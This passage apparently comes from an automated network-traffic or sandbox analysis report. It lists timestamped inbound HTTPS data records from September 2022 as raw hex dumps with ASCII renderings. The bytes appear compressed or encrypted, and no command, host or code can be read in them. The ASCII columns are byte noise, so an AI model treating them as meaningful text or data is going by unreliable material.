                                                                                                                                                    2022-09-29 12:59:08 UTC13362INData Raw: dd 77 af 0e 04 3c eb c6 fb df d0 0a 53 c4 1b 8c 38 83 cc 1e c9 c2 0e e6 83 46 4f f3 0b d1 e3 87 83 6c 1f bb c2 ef df 4a a8 77 3e e2 a1 40 b5 87 39 65 0c 71 eb 32 c6 61 b2 97 27 f8 87 ad ef fd 9d cb 9b a4 f6 4e 87 5c 5d c6 4c 24 5c 0f ec 86 bf a1 f1 cc 4a 4e 0a 07 37 39 d1 ff e7 8c 84 67 a3 23 fa 11 d8 44 62 6a 0c 62 18 16 b4 30 07 22 31 ae 79 66 06 f0 85 55 26 d1 f7 81 c6 de 39 47 41 8d 3b 5f 0a 48 85 b6 60 8e 69 5d 0a 69 2b 1e f5 50 37 a0 49 7d 30 87 23 83 d9 9e fe 79 55 54 eb 5d de d4 21 82 01 bc 33 ad b9 73 f5 59 44 a2 cc a9 ee 84 c3 9f d7 75 1c a0 7f ff 85 81 e9 c0 dc ce 5a 51 1d 01 05 d6 1e c3 e0 32 82 42 8d 71 e4 97 1e df bf 0d 30 26 30 30 05 e3 f0 94 fb 33 6e 66 25 4d 4b 5d 21 1e 02 b6 f3 9b 09 0c 9f 12 b3 6f 79 1e 99 ba 98 c5 7d ff cb fb b5 63 e1
                                                                                                                                                    Data Ascii: w<S8FOlJw>@9eq2a'N\]L$\JN79g#Dbjb0"1yfU&9GA;_H`i]i+P7I}0#yUT]!3sYDuZQ2Bq0&003nf%MK]!oy}c
                                                                                                                                                    2022-09-29 12:59:08 UTC13378INData Raw: ee 78 d9 b4 03 ed ee f6 78 f3 0e b7 a0 3e fc 53 0e 36 12 64 29 c2 5f 07 66 7b 8e cc e1 7e 11 4e 09 8d 36 cb df a7 8b 87 a4 2c 1d 45 45 63 97 96 1c 9f db 6d 8c b7 e5 c5 00 9d cf c5 8a 76 67 41 cc 96 f6 32 0b 7c 7b d4 54 fb 1f 0a 1d a4 9f 2f 8b 38 44 81 8a f4 08 e7 9f 57 ba 6d 0f 28 d8 8e e0 28 37 58 4c ec 9b aa a5 f6 06 67 d2 87 82 ec fb 99 30 82 7c 07 c4 db 3e c5 48 fa fd d4 e5 d0 db 09 1d 55 10 b5 ec 1b ee 49 6c 42 8e 66 ec 4c 73 d7 e5 a1 91 af c4 1c 8d 9b 6a 4b a0 73 f7 9f 35 11 7f f3 0e 93 b0 c2 32 e7 ee 20 f6 a4 96 d4 3c 1c e1 94 4f 83 fe 5f 9c 24 f2 38 05 5f 2e 89 0b 4a 13 8d 3d 34 b5 f3 d8 aa b2 d7 ce d1 61 82 2e b4 3a c6 2b f5 6e 7a 13 8c ef 6a 2c 06 f8 bd 01 70 05 f5 7f ab ee 4c 01 50 d1 e8 f0 8b cc 12 09 73 24 fe 77 3e a6 04 e4 c9 72 e2 6c a2 ea
                                                                                                                                                    Data Ascii: xx>S6d)_f{~N6,EEcmvgA2|{T/8DWm((7XLg0|>HUIlBfLsjKs52 <O_$8_.J=4a.:+nzj,pLPs$w>rl
                                                                                                                                                    2022-09-29 12:59:08 UTC13394INData Raw: 3c 4b 93 aa ee 94 78 ab 8d ae 91 c7 76 e8 08 88 fc 3a 44 6d 6b 78 fc 9a ef 8b 8d 7a 68 ed 5d 0a 02 8a 21 50 d2 d5 84 26 01 bc ed a0 70 18 b4 be ed aa bc e3 3e 48 a1 14 c6 b6 d9 30 9a eb 0e 09 d3 f8 ea d3 f9 aa 8a 5b 8f 32 c8 5f 45 08 b9 91 0c 59 6a fe f9 93 c8 9d 07 7e 07 f4 1d f3 5f 6e c1 72 c2 3b 0b 12 50 b9 ae 2c cf b6 98 60 1c f6 1f ab 90 00 1b 1c 80 81 25 91 76 38 66 04 7b 53 7e 49 4d 83 25 67 ad df 1f 28 96 de cd 44 4c 37 26 43 99 49 f8 8e 06 65 d2 b5 1e c0 0b e4 69 ad c2 a7 c3 72 c6 b9 c7 ec 70 ce 3f 24 8c 1d 2c 00 b7 68 91 01 8b 1d de 6e e4 53 5a 3b e4 ae b8 6b 95 03 18 d0 1a 3a 86 da 4c db 54 ca d6 3b ae e0 e4 a9 78 28 44 1d d9 c3 ce 27 be 1d 50 31 9d fe 59 f1 1d f1 f4 26 f1 bd 11 fe cf 0e 37 80 3b 69 b7 f6 cf 17 c9 c2 19 8b 3f a6 18 b4 99 80 64
                                                                                                                                                    Data Ascii: <Kxv:Dmkxzh]!P&p>H0[2_EYj~_nr;P,`%v8f{S~IM%g(DL7&CIeirp?$,hnSZ;k:LT;x(D'P1Y&7;i?d
                                                                                                                                                    2022-09-29 12:59:08 UTC13410INData Raw: 2b 0e ff a9 17 fa 4e b8 6c 66 2f e0 af 30 78 0c d0 3f ce 0b db c3 68 be d5 92 68 ab e6 81 47 a6 8a d1 56 5f b0 b1 6c ef ec d9 38 96 78 85 cb 97 85 01 0c bd 9d b7 e2 57 1a ed ab fc 49 f6 a4 bf f4 ca 74 9d 5d 4c c4 c8 e4 e6 68 01 37 e2 25 45 89 3c 11 e1 41 32 46 f0 0f a4 19 de 1a ac b3 4c ae 01 fc 6b b4 bd ee 0e 4d 7a 9d 74 66 d3 7f 8a 41 ad b4 96 66 9f d1 cc 70 04 ea a8 b9 09 62 0b a4 af 4a b9 f1 24 dc 1e 21 7c 5a 0f 07 dd 2a 19 d7 c9 fe b6 a0 27 8c 31 da 56 0f 74 89 35 a2 aa 84 b9 49 c2 cb 8e d3 ca 5a 42 bc 32 c8 f5 33 e6 9a 11 80 f8 71 a0 90 c9 5d ac 1a e9 cf 32 48 c9 90 5a a0 eb 59 cc 4c 0a e4 ed ea a0 7c bb 21 b2 88 89 61 b0 5e 3a c8 53 73 98 88 3c 8f ab 67 f2 c8 54 71 24 8f 4a dc da 43 ff 49 06 5d 84 00 81 ee ac 67 a1 ed 00 bb 62 72 a0 bd ba 64 e4 ac
                                                                                                                                                    Data Ascii: +Nlf/0x?hhGV_l8xWIt]Lh7%E<A2FLkMztfAfpbJ$!|Z*'1Vt5IZB23q]2HZYL|!a^:Ss<gTq$JCI]gbrd
                                                                                                                                                    2022-09-29 12:59:08 UTC13426INData Raw: 3b a6 69 44 f1 9e 7b f0 a4 7d a5 72 f4 c1 30 e1 88 8b b7 0b ff 9a da 1c de 85 be c0 c0 86 31 55 7a 08 21 7c ee 77 86 48 08 50 c4 c2 04 eb 95 4b f4 8f 53 14 6c 15 f8 5e db a3 81 f9 6a 9a 44 70 dc e8 e6 ad 2d 04 3d 18 45 08 4d fb 7f 2c ec e5 99 cb 64 b8 87 26 de 59 34 9f 87 3d 94 31 a0 6e b6 55 58 f6 6d 6f 16 31 26 05 23 c8 92 71 7e ae 49 12 1a 99 9e c4 a9 7b 18 52 b5 02 e9 94 71 80 e6 fc de 3a c6 85 53 11 61 37 d0 71 3d c0 95 46 30 7e 6e 1d d5 07 fd 08 02 85 71 d6 ad 4b 3f 71 21 82 61 fe 2b d8 cd 74 f4 c0 0f 4d 30 2f d4 c0 9a 28 5b 73 f5 56 6b 8e ec 52 1a 7d 29 4a 10 3d cd 72 d7 95 31 f8 9e 8b fa 3b 4a 9f 42 ab 0d f4 f9 3a 3e 09 dc c3 29 68 06 a8 a1 a1 82 34 cc 34 d3 42 63 e4 26 c2 44 c3 a8 3a a8 31 ce e2 14 63 37 dc bd a2 75 58 d5 db fa 87 a3 a3 4e d4 fa
                                                                                                                                                    Data Ascii: ;iD{}r01Uz!|wHPKSl^jDp-=EM,d&Y4=1nUXmo1&#q~I{Rq:Sa7q=F0~nqK?q!a+tM0/([sVkR})J=r1;JB:>)h44Bc&D:1c7uXN
                                                                                                                                                    2022-09-29 12:59:08 UTC13442INData Raw: 49 66 aa 4f be 02 28 a9 c2 7c 5a ea e2 fe 90 79 45 e0 33 41 1c 8d de 41 97 dd 63 ff 36 9a f5 6d 5b 48 17 6c 56 8f 14 6e f0 1f 15 bf dc 1e 37 f3 ca 1b 76 b2 31 6e 21 43 99 28 23 6b a7 c2 77 cd c2 8f e5 3f d3 60 91 ad 09 27 cb 82 45 a3 91 2e c0 c2 85 60 6e 1f 26 ea d4 05 44 0a 3d 91 0b 8c 74 18 21 e9 fc da 4e d0 98 07 1e 31 2b ea 47 75 3b 92 a8 d4 07 f5 32 16 70 4d 1e ba a0 19 30 6e 18 0b 25 8e 01 91 f4 30 ed 8f a4 f6 6c 69 89 6f 1a 34 33 b8 65 96 24 08 b8 e2 80 60 7d 09 c4 b5 cb e2 9e 20 5d 52 26 26 c0 55 27 63 8a 06 40 e5 08 59 aa 31 c7 e6 3f 63 83 14 62 7c 31 36 da 97 3e d8 43 00 f8 cd 30 5d f3 cf 39 99 d1 e4 a4 b6 62 e0 f8 d7 91 29 47 fe 88 f1 3f 86 5e a4 d1 d3 f3 79 d4 5d 35 52 f1 58 31 74 6c ba af 9e 90 93 ec f0 58 1d 9b e5 f2 c2 5c 6c 97 77 e2 df 01
                                                                                                                                                    Data Ascii: IfO(|ZyE3AAc6m[HlVn7v1n!C(#kw?`'E.`n&D=t!N1+Gu;2pM0n%0lio43e$`} ]R&&U'c@Y1?cb|16>C0]9b)G?^y]5RX1tlX\lw
                                                                                                                                                    2022-09-29 12:59:08 UTC13458INData Raw: 4f 15 08 22 05 1b 36 ce c9 3c 22 95 1f b4 cc 55 20 c4 55 2a 6d 95 f8 30 6a f5 db 5c 93 51 c5 49 fe 45 5d ba 1c a4 60 8e 24 91 c4 a0 a3 22 8d 13 70 a7 30 d6 7f c1 51 a1 84 19 85 b3 8d 2f 97 d5 4e f9 a7 62 8d 01 b8 86 0a 3d ec b3 b7 7d f0 f9 6e af bb 3f 44 c6 e6 5a 7f eb 3e a7 ff 28 23 e6 69 c3 82 ad df da a6 c6 21 a3 11 a6 6d 6d 97 61 12 4a 03 14 cc f1 1f f0 1e 6a 73 74 98 26 25 9d a9 e9 bf 27 dd c3 4b 49 d6 7a ba f7 f8 f4 70 ed 3d 5b 8c da ce fc bb 24 22 82 16 1b 5f e3 f8 b7 70 07 c4 0d e9 1a ca 30 5c fe f3 63 b4 51 b9 3b 6f 73 c1 0f bd f9 a2 14 8b 12 00 2d 9c 54 d5 ce 6b 86 ae e8 f7 83 ed 2e 5c 70 16 66 be 62 33 04 b1 01 0b 4b 5f f9 e8 10 b5 a2 70 46 34 24 4f 05 ff 43 87 44 d1 92 65 f7 04 28 58 e0 ca 2a b1 10 c9 17 a7 47 e7 ca 8f 5b 75 b5 aa 51 45 4e ab
                                                                                                                                                    Data Ascii: O"6<"U U*m0j\QIE]`$"p0Q/Nb=}n?DZ>(#i!mmaJjst&%'KIzp=[$"_p0\cQ;os-Tk.\pfb3K_pF4$OCDe(X*G[uQEN
                                                                                                                                                    2022-09-29 12:59:08 UTC13469INData Raw: a2 29 02 13 f8 fd dd 2e a6 4e 8f 01 db 00 dc 61 0d e5 cc 12 dc ed 61 21 bc 6d 3a 82 13 30 ed cd f5 2a 8d 6e 05 65 10 bf 19 47 fd a1 1f e0 0f f1 bd 58 08 4f f4 dc 38 25 9e 97 6d 98 c4 e1 0c 8f 36 0d e9 0b 14 5b 9f bf 9d e6 b4 95 67 2b 2b 09 4d c6 79 64 59 e8 ab 01 75 45 24 54 4b 56 4f 23 6c 3c 21 67 83 bb b0 c4 83 53 45 24 9e 1e f3 72 27 8b 20 b4 ec 26 f1 d7 71 0b d3 53 45 4f 59 46 77 b4 5d a6 d5 84 de da be 63 6f fe dd 8a cf a7 11 27 e6 3e 01 bb 26 72 eb 73 89 8b 16 66 db ba 8f c0 1b 9a 16 2d 8e 33 91 30 dc 29 83 5e a2 f4 8c 67 6e 65 4a f7 4c e2 6f 5b 35 3b e4 db 01 b1 a3 9e 79 70 8c 11 2e 20 2e 8c 96 d9 7e 1a 40 d0 c2 60 21 28 f9 d1 c5 4b ee 5c e2 99 8c fc be ef 6c 1d 36 3e 40 a5 5c be 25 5a 06 31 b8 2d e2 17 42 25 12 0c 2a 46 52 76 2f 5c f6 ff 70 c5 0e
                                                                                                                                                    Data Ascii: ).Naa!m:0*neGXO8%m6[g++MydYuE$TKVO#l<!gSE$r' &qSEOYFw]co'>&rsf-30)^gneJLo[5;yp. .~@`!(K\l6>@\%Z1-B%*FRv/\p
                                                                                                                                                    2022-09-29 12:59:08 UTC13485INData Raw: 0a 17 17 77 a9 02 c6 99 68 b1 d1 8f 11 fe 8d 2f f2 a0 da 00 11 c0 cf 29 cc f4 62 34 79 a9 01 b3 6a ba 12 f7 e5 bb 4d 87 aa 48 61 ae ee 4d 6d a1 34 42 87 d7 b2 c8 f9 90 eb f3 a1 dd 85 e8 1d ce cd 8f da c8 ac 18 1e e4 15 17 f9 9a ef 5d 6e c3 d2 22 da d2 bc 6e 09 30 4d 56 03 5a d5 35 e1 c9 b4 30 0a ac 44 71 47 02 eb 7d 0d d0 97 e5 01 6d 05 1e ff 50 ec d1 47 a0 6a 66 78 8c 71 55 cd ee 6e 73 a2 ad be 9f 96 a2 66 79 95 67 92 62 f2 e5 ed 2e ce d6 64 4c 4d 35 34 07 13 be 59 d1 11 81 2e f9 78 ff 75 9c 56 3f 4c 10 9e 06 c7 5a 57 39 8d c4 69 31 8a 5e 10 9c 11 19 1b 74 28 74 cc b9 d7 06 15 c4 a6 c1 74 c5 91 55 e8 c8 98 79 ce 43 35 8d 4f a4 b8 47 97 14 fe be 09 33 35 28 4b f3 d0 c8 32 d6 2f 74 e6 5e 20 af a4 57 f7 df 71 a2 9f 6b 7c 8d 8b 7a 14 d3 05 ef d8 51 ca 0c f7
                                                                                                                                                    Data Ascii: wh/)b4yjMHaMm4B]n"n0MVZ50DqG}mPGjfxqUnsfygb.dLM54Y.xuV?LZW9i1^t(ttUyC5OG35(K2/t^ Wqk|zQ
                                                                                                                                                    2022-09-29 12:59:08 UTC13501INData Raw: 0f 68 81 2a b4 16 17 54 88 e3 93 7b 37 d6 ff a4 9e ea ea b3 76 88 de b4 75 6d 9a a4 9b fe b0 2d ce 5e 8d b1 81 7d 3a 39 f6 45 b6 af b2 6d 0b d5 01 aa 53 3c 7f a1 43 c2 8f 55 7f e6 84 ae 27 81 0e 46 79 69 b8 f0 22 18 85 0f 3f 60 39 5f dd 52 94 27 00 0d 88 62 ae 29 69 ca e3 0a b4 86 5d 02 5d 79 c1 20 dc 76 74 85 4c de b8 03 a7 04 d8 62 c0 b9 f5 42 3f 60 b8 71 29 ac a0 80 67 c0 cf 47 cf a3 3b 57 da cc 22 f0 1e 17 9a 9c 1e 4d 65 49 62 87 78 b3 dd cc d0 9e 88 41 fb 90 22 0e fc 92 2f a3 19 be 07 3c 91 8e 19 d1 5d 5f e0 6a ef 4b 9d 70 7e 88 28 3b 1a f3 7d 72 28 21 62 50 be fc dd 5d 66 c8 66 94 bb 51 b8 f9 b4 78 42 02 07 6f 88 2d 07 a5 8c b5 80 f7 b7 45 3e a6 0f 40 2a 93 c2 24 61 c4 48 d3 7d 2d 3b 4f 2f 2d 63 a5 2e c5 d2 93 0a d6 dc 38 ee 42 4b 5e fc 9e 4b f4 96
                                                                                                                                                    Data Ascii: h*T{7vum-^}:9EmS<CU'Fyi"?`9_R'b)i]]y vtLbB?`q)gG;W"MeIbxA"/<]_jKp~(;}r(!bP]ffQxBo-E>@*$aH}-;O/-c.8BK^K
                                                                                                                                                    2022-09-29 12:59:08 UTC13517INData Raw: ba 12 ae 60 76 26 ee ec d9 35 38 23 23 62 d0 ff e6 16 20 a0 a4 7f e7 50 e2 b1 53 e4 c8 c3 97 69 28 9e 62 5b 71 31 ca 6b 1e 95 97 ae 52 73 bb 1f 67 e5 11 ff 46 98 8e f4 50 ed 92 cd dd b0 ed a9 67 e7 ef d1 06 71 7d c2 21 c0 aa 5e 09 c5 d1 ed 79 b1 31 65 3d dc ed 26 2e 14 e1 47 40 0a 26 f5 07 d4 ac 14 58 12 16 74 6b 01 d1 d2 a2 86 8c 6a 6d 8f 02 d9 06 1c bb a3 31 c4 70 a3 38 a5 3b 0e 48 59 73 e8 5a af fa 48 15 82 19 07 cd 45 00 a8 8d 9b 42 6e e9 39 55 7a 6c 70 82 b6 e2 79 d7 83 9b f4 39 86 9d 9b f8 f3 4c 62 d3 c3 c2 bd 88 a2 e0 30 60 50 4b fc 97 3e 42 e1 de 62 e1 e6 ff 21 91 bd 7b 0c f2 22 32 0c 43 14 af 68 02 1c 60 ea b5 f4 09 f8 79 a7 01 56 21 f4 bc f8 2a 24 65 7e cc cf 07 1e 3f 1c 9b 2f 63 2e 07 17 54 2f 65 39 e6 33 27 df 29 fd 28 8a d7 6e 69 ef 7b 28 08
                                                                                                                                                    Data Ascii: `v&58##b PSi(b[q1kRsgFPgq}!^y1e=&.G@&Xtkjm1p8;HYsZHEBn9Uzlpy9Lb0`PK>Bb!{"2Ch`yV!*$e~?/c.T/e93')(ni{(
                                                                                                                                                    2022-09-29 12:59:08 UTC13533INData Raw: 8c 06 58 c6 01 a5 d3 92 51 61 4c 6e 78 45 9a 2e c3 1d 15 6a 19 b9 1c c2 97 63 24 6c ce 37 65 97 ac cb 8e 23 6e 68 c5 cd b9 6b 89 91 5e d0 8a 9e 61 6b 6c 60 ef 32 68 62 5f 58 5c 7f e9 48 81 9e c4 5a e5 4e 32 d5 96 21 f4 03 fe 60 14 41 53 45 05 9e b2 9f 1c ce ba 13 22 5a 8f 20 df f8 9d e1 1e 3f 3b ce 52 c9 6d 8e 36 c7 58 40 67 26 70 2a f9 57 1e 6b 9f 78 67 05 2f fb ba e3 1b 5d 45 f0 f6 b9 1a 1c 39 2b 17 86 46 95 34 09 4a aa af bb 5d 6b 74 9c 04 e6 c1 71 54 ff 14 89 3a 7e 99 4f 17 4f 3a 9b b4 03 71 27 52 e1 32 ed ea 86 e0 ab 33 f1 b6 09 eb aa 6b 95 c6 53 2e 4c 82 af 61 f9 a1 3a 47 6e 3c b5 3d d2 a2 ec 0b 6d fa 1c 2c 37 6e 40 a8 ab 41 78 13 e5 f1 b6 86 ba ea 70 8b 5b 38 0e 34 40 d4 2f 83 df 36 05 0f 9e e4 a1 82 50 a5 1d 48 6e 4f 57 e9 24 92 77 be 5b af d9 8f
                                                                                                                                                    Data Ascii: XQaLnxE.jc$l7e#nhk^akl`2hb_X\HZN2!`ASE"Z ?;Rm6X@g&p*Wkxg/]E9+F4J]ktqT:~OO:q'R23kS.La:Gn<=m,7n@Axp[84@/6PHnOW$w[
                                                                                                                                                    2022-09-29 12:59:08 UTC13549INData Raw: 4d 7b e3 04 01 0e ed c7 a6 c2 ce 9b e3 89 d6 0f 64 22 19 32 3e 40 0f 9c 1a c4 cf 2f 39 62 40 01 0a d0 2e 10 d9 99 f8 aa 74 99 10 a2 58 3c 9e 16 3a ff 9b c7 ac ee ee 47 34 26 04 a4 f0 d6 d3 26 a0 53 eb fd 4c 36 bf 09 b4 8f 8d 54 11 b1 b4 92 8a 8c 66 be 8a e7 6d 29 3d 42 93 2d ac e5 2b 1f 27 81 73 9b b1 2a fc af 52 45 dc 75 3f eb b6 a4 14 20 a8 57 8c be ce d4 7a fb 76 33 13 ed 69 c1 62 df be 68 34 ce 3a 17 08 5e 24 52 84 e4 05 22 70 0b 78 a8 76 cd 44 49 51 cb 0b 67 6a ff cd e2 fa c9 96 bd 68 ae 13 12 4d 95 d8 33 f2 9d 9a 5b 97 aa 23 dd 0d e8 bb 88 95 d5 85 25 be 6e 88 9a b5 e3 ed 84 76 21 bc f0 1e e9 d7 0b 2b 63 ff 5a 57 58 6d ea 3a 86 bb 58 4b b4 0a b4 a0 05 5f a2 f9 0d 37 68 16 1d 1e e9 fd 53 80 a9 c8 4c 39 9a 97 71 29 8e 39 4f 40 85 c1 c7 f0 f6 34 cd 6a
                                                                                                                                                    Data Ascii: M{d"2>@/9b@.tX<:G4&&SL6Tfm)=B-+'s*REu? Wzv3ibh4:^$R"pxvDIQgjhM3[#%nv!+cZWXm:XK_7hSL9q)9O@4j
                                                                                                                                                    2022-09-29 12:59:08 UTC13565INData Raw: 6a 27 37 c3 81 ba c1 73 e7 a2 1c 6d 28 b7 9d da 9a 3a 43 bf 20 91 7a ef a4 c5 b6 1a 4d 92 b3 b6 f3 f9 af 90 b7 f4 df 66 3c 47 73 45 67 76 af dc ff 3b 74 6f c5 2c b5 ac c5 2f 01 97 ab 34 29 6f 3e 01 89 38 14 92 43 7c b8 3c c9 bb b1 a0 a0 50 71 69 7b 9a e9 d5 71 7c e3 4b 6a db b1 7c 88 52 00 63 4b 0d 08 71 7f ef 7c c9 8b 6e 48 3c c2 35 e7 69 65 90 89 76 6a fe fa 55 bc e8 af 84 7c 1f 1a 81 dc 78 c7 4f aa 83 16 73 a0 ef ba e7 14 20 42 9e 06 fd c9 23 59 a0 ee 2f 03 81 0b 60 45 ae c8 6b 80 80 87 ad 2a a2 92 ac a3 de 92 65 35 4d 16 6a 2c ba 40 9f 28 25 1a ae 59 ed 06 53 8f e8 2d cb 91 96 1c 8b 90 35 8d 60 a2 7d 97 ad e6 3e c9 99 1f 77 28 aa cc c6 eb 20 38 b9 41 57 19 47 50 ee bf 71 84 59 2d de 70 48 99 2b 09 1e 11 37 4d 6b 8e 8a bd 8d 26 89 d7 46 4b d4 a1 21 82
                                                                                                                                                    Data Ascii: j'7sm(:C zMf<GsEgv;to,/4)o>8C|<Pqi{q|Kj|RcKq|nH<5ievjU|xOs B#Y/`Ek*e5Mj,@(%YS-5`}>w( 8AWGPqY-pH+7Mk&FK!
                                                                                                                                                    2022-09-29 12:59:08 UTC13581INData Raw: 35 4b 26 65 64 8f 69 75 cb 17 29 68 12 bd 98 4e 70 ad e6 d5 d4 10 3c 7c e8 52 18 30 05 2a 60 6b 3e 74 2a 87 6c 07 14 6c 3c da df 64 42 fa c4 25 bc 5e fc 27 e7 a8 17 15 f4 9b 21 05 6b 5d 0a 17 a2 6a 7f 69 b4 8f b0 a5 02 39 dd cd 44 1e 3c f5 04 3f 48 6b 99 da 4c f8 23 25 1d 0a dc b8 a6 48 5a b9 75 28 b8 a3 ed e2 2a 42 cb 83 4d 76 ad 21 b3 02 02 e7 a3 ad 37 e2 95 b5 a6 a6 ab b1 2b dc 2a 88 50 cd 3d 15 cb 46 e1 f7 32 ec 18 20 15 7a 9b 1c 97 8b 3e 59 34 30 07 4a 7f 56 60 61 b0 61 6c 0f 14 26 b6 71 cd 8c 51 d6 70 98 9a 9d ca c7 ba 1b 7c ee ab ca b3 6c 87 83 32 4c 05 6b 51 0e 06 20 71 17 ba ef 5c d0 80 9b 06 bc 0c 9e 45 4c e2 d7 cd 86 a0 ab ae c0 80 02 c2 5b e5 f6 74 e1 30 87 8c 7d 5e e9 8f d1 fa b1 3a 26 44 61 32 ad 4c 2f 76 6d 4b 59 ae 8f be 81 33 19 a5 7d 04
                                                                                                                                                    Data Ascii: 5K&ediu)hNp<|R0*`k>t*ll<dB%^'!k]ji9D<?HkL#%HZu(*BMv!7+*P=F2 z>Y40JV`aal&qQp|l2LkQ q\EL[t0}^:&Da2L/vmKY3}
                                                                                                                                                    2022-09-29 12:59:08 UTC13597INData Raw: e5 29 25 f3 6b 4e 98 ff a3 8e 8f 80 b6 da a2 fc 25 db a5 14 27 e6 f0 d5 bd 1e 12 0e 2b 52 8b 59 e4 7f 61 10 13 77 d9 72 47 fb 56 4a 58 8d fb 64 1d f1 98 45 6f 2f a4 3e c0 d9 5d c0 ab c6 8e 66 55 d2 9c 62 d8 55 e6 d1 4d 7a dd 56 ab 39 37 a9 fc e7 f7 1e d5 a1 ae 16 dc 8c 01 fb dc 42 ce 25 ac 9f 5e 4d 32 2c d0 90 da ba 68 eb c4 b6 44 1c ae b0 e4 1a c4 93 b2 0e 3f a7 4f 0d 21 63 83 11 98 9a dc e9 4a a8 e1 37 e4 f2 af f7 c4 cd dd 67 d2 34 c5 90 38 2d f1 8b 37 1d f5 7b a4 85 5d f0 03 3b 92 52 96 64 2b 1e 52 bb b5 ac ba af 31 f8 80 47 57 2b b6 1d e6 53 02 f3 e6 8d 50 9a e6 07 92 27 f3 9d f4 3d d5 74 cc d4 86 48 40 a7 7e b8 b4 40 f1 a0 2a 76 b9 61 6f 70 cb 0b 68 bc 63 1a 23 79 bf 22 6e 37 8c 4a e9 d7 9a 3f 41 fa 19 b3 3c d1 b7 be 44 f0 99 e7 57 d7 53 53 0b 29 ed
                                                                                                                                                    Data Ascii: )%kN%'+RYawrGVJXdEo/>]fUbUMzV97B%^M2,hD?O!cJ7g48-7{];Rd+R1GW+SP'=tH@~@*vaophc#y"n7J?A<DWSS)
                                                                                                                                                    2022-09-29 12:59:08 UTC13613INData Raw: 42 e8 dc 50 a0 94 5b a1 89 53 8c 88 8e 5b 69 31 2a b4 ba 46 53 d7 c0 55 e1 46 df fd 6e bc 1a be cd 9c 12 b3 5c 98 7d 7f 5b 99 de 23 42 a4 4a ed 27 a2 f4 71 68 e1 c5 ca ad 51 8d 36 aa dc 05 8e 28 34 09 03 61 f5 4e 16 2a db b1 3d e7 84 02 61 2f 5d de 22 48 9f 20 e6 06 50 62 4d fa b5 a4 38 2d de 3e ef 23 23 95 2e 20 9e 4c 74 9c b8 f5 7f 36 31 b7 83 de d6 b5 86 29 14 9a e4 6c 26 95 c5 bb c5 3f 88 cf 09 bf 58 0f 6e 08 b7 81 6a e9 a8 2a b1 f3 c2 74 a6 aa 14 bd 2a d4 1f b2 0e c8 5e b1 4c 81 16 28 d8 83 6d 7d 4a c4 75 dd f0 4e 78 82 3c 56 5d 4e fc 85 ec 72 1f 01 37 2b 8c 3e 11 18 9a 2a 02 d8 94 29 8c a4 47 15 5a 48 ff 30 0e 82 f6 11 90 42 4e 32 67 3e fa bb 39 ea e3 38 70 8a 8b d2 cc 78 65 79 eb 09 08 19 73 4f d6 70 b4 b0 dd f6 5e 88 b8 e5 8e 18 6c 30 1b c0 6a 5c
                                                                                                                                                    Data Ascii: BP[S[i1*FSUFn\}[#BJ'qhQ6(4aN*=a/]"H PbM8->##. Lt61)l&?Xnj*t*^L(m}JuNx<V]Nr7+>*)GZH0BN2g>98pxeysOp^l0j\
                                                                                                                                                    2022-09-29 12:59:08 UTC13629INData Raw: 38 77 3c 86 29 18 11 40 57 b0 af a6 13 08 d2 8b 36 57 a5 47 27 d5 b6 b0 22 0b 6d 82 f9 8f ab 88 fe 66 b4 11 02 4e ab 95 7d 4c 28 06 3b e2 32 f3 22 b1 33 20 29 2b a8 e5 ac 9c 51 b6 7d 08 c2 d8 d3 50 64 4e 4b 46 28 a1 b0 19 1b 84 a3 23 81 3f 35 9b 79 0f 10 e1 78 5e 84 f9 82 2f 7e 3e 4c 16 4a fe 34 04 3a 66 d6 c8 05 4e 9c 88 12 39 01 79 0e d3 ce 96 9d 89 22 d0 16 89 a0 2a 9e a5 a6 03 e0 ef 88 7d bd 9b e4 60 9d 39 c7 fa 56 ef 3a f0 81 5c 10 4f 0e 0a d9 cd 82 c1 91 f9 7e f3 a5 51 64 a7 46 08 73 51 45 69 26 5f b1 69 24 5a 65 0b 14 7a da 10 f5 c4 a3 88 29 1e 6c 35 b1 eb d0 41 0e fa 55 29 81 52 7f f9 7a 19 af 89 bc 1e 83 41 0f 10 d8 74 06 21 50 cd 36 55 bf b1 82 de dc b2 d0 4b 8d 34 a0 df 45 8e 85 24 37 db 1c 7f 35 92 04 fa cd 75 57 4e 02 66 51 10 f9 d7 29 b7 6f
                                                                                                                                                    Data Ascii: 8w<)@W6WG'"mfN}L(;2"3 )+Q}PdNKF(#?5yx^/~>LJ4:fN9y"*}`9V:\O~QdFsQEi&_i$Zez)l5AU)RzAt!P6UK4E$75uWNfQ)o
                                                                                                                                                    2022-09-29 12:59:08 UTC13645INData Raw: 0d 6b c4 8f a3 c5 42 1d 9c 65 df 28 79 69 fc 18 b2 f0 39 09 be 85 d3 52 1a 0e 6d 73 5a eb 23 c9 ef 22 3c fe 67 60 5f 07 e2 cb 4a 2d f3 65 e8 26 3d 06 a9 cd 50 3a 22 41 c7 02 0b 41 11 0d 3d e3 f4 73 01 f7 7d 4b 2f e4 1f d4 3d 2c b4 d5 90 32 11 39 3e d2 63 fe 56 ab 70 fd 25 ce c2 ad 4b ff bb 48 ab 89 0d f4 31 87 bf 84 7e ec 58 f5 22 92 ec e1 cc 83 f8 9a 03 3d 76 0e 85 23 e7 16 2a 0b 74 df a9 ac a0 4a 90 bc 16 c8 36 25 ea 21 41 3b fd 3f d6 dd cd 55 92 a5 bb 2a 5c fe 0c 6b 54 80 b2 5b 92 3b 6c 1a 53 52 72 e8 d1 fc d7 0b 3a c2 e3 01 59 89 16 8e 14 f3 48 d9 dd d0 8f 75 2f d5 97 a8 51 2d d7 0a 84 7f 76 3b 0d 8d 06 0f b8 8b 9f c0 59 65 22 50 9e d2 23 9a 45 56 68 98 6c a6 ef 42 82 7e 8b 15 bc ee 18 5b ef 6f 3b 70 03 0c 67 c8 52 ce 2e 56 a0 3c fe 41 40 37 d2 a3 e9
                                                                                                                                                    Data Ascii: kBe(yi9RmsZ#"<g`_J-e&=P:"AA=s}K/=,29>cVp%KH1~X"=v#*tJ6%!A;?U*\kT[;lSRr:YHu/Q-v;Ye"P#EVhlB~[o;pgR.V<A@7
